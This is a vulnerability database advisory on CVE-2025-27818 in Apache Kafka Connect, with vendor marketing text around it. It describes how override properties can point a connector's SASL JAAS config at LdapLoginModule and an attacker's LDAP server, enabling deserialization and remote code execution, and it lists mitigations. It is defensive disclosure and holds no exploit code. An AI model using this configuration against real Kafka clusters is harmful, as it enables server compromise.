Wiz
Vulnerability DatabaseCVE-2025-27818

CVE-2025-27818
Java vulnerability analysis and mitigation

Overview

A security vulnerability (CVE-2025-27818) has been identified in Apache Kafka, affecting versions 2.3.0 through 3.9.0. The vulnerability requires access to alterConfig to the cluster resource or Kafka Connect worker, and the ability to create/modify connectors with arbitrary Kafka client SASL JAAS config and SASL-based security protocol. This vulnerability has been present since Apache Kafka 2.0.0 (Kafka Connect 2.3.0) (Apache CVE List, OSS Security).

Technical details

The vulnerability allows an authenticated operator to set the sasl.jaas.config property for connector's Kafka clients to 'com.sun.security.auth.module.LdapLoginModule' through various override properties (producer.override.sasl.jaas.config, consumer.override.sasl.jaas.config, or admin.override.sasl.jaas.config). This configuration enables the server to connect to an attacker's LDAP server and deserialize the LDAP response, potentially leading to the execution of java deserialization gadget chains on the Kafka connect server (Apache CVE List).

Impact

When successfully exploited, the vulnerability can lead to unrestricted deserialization of untrusted data or Remote Code Execution (RCE) when there are gadgets in the classpath. The severity is particularly significant since Apache Kafka 3.0.0, as users are allowed to specify these properties in connector configurations for Kafka Connect clusters running with out-of-the-box configurations (Apache CVE List).

Mitigation and workarounds

Apache Kafka 3.9.1/4.0.0 introduces a system property (-Dorg.apache.kafka.disallowed.login.modules) to disable problematic login modules in SASL JAAS configuration. By default, 'com.sun.security.auth.module.JndiLoginModule,com.sun.security.auth.module.LdapLoginModule' are disabled in Apache Kafka Connect 3.9.1/4.0.0. Users are advised to validate connector configurations, allow only trusted LDAP configurations, and examine connector dependencies for vulnerable versions. Additionally, users can implement their own connector client config override policy to control which Kafka client properties can be overridden in connector configurations (Apache CVE List).

Additional resources

SourceThis report was generated using AI

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Additional Wiz resources

Cloud Vulnerability DB

Cloud Vulnerability DB

An open project to list all known cloud vulnerabilities and Cloud Service Provider security issues

Cloud threat landscape

Cloud threat landscape

A comprehensive threat intelligence database of cloud security incidents, actors, tools and techniques

PEACH

PEACH

A step-by-step framework for modeling and improving SaaS and PaaS tenant isolation

Get a personalized demo

Ready to see Wiz in action?

“Best User Experience I have ever seen, provides full visibility to cloud workloads.”
David EstlickCISO
“Wiz provides a single pane of glass to see what is going on in our cloud environments.”
Adam FletcherChief Security Officer
“We know that if Wiz identifies something as critical, it actually is.”
Greg PoniatowskiHead of Threat and Vulnerability Management
Get a demo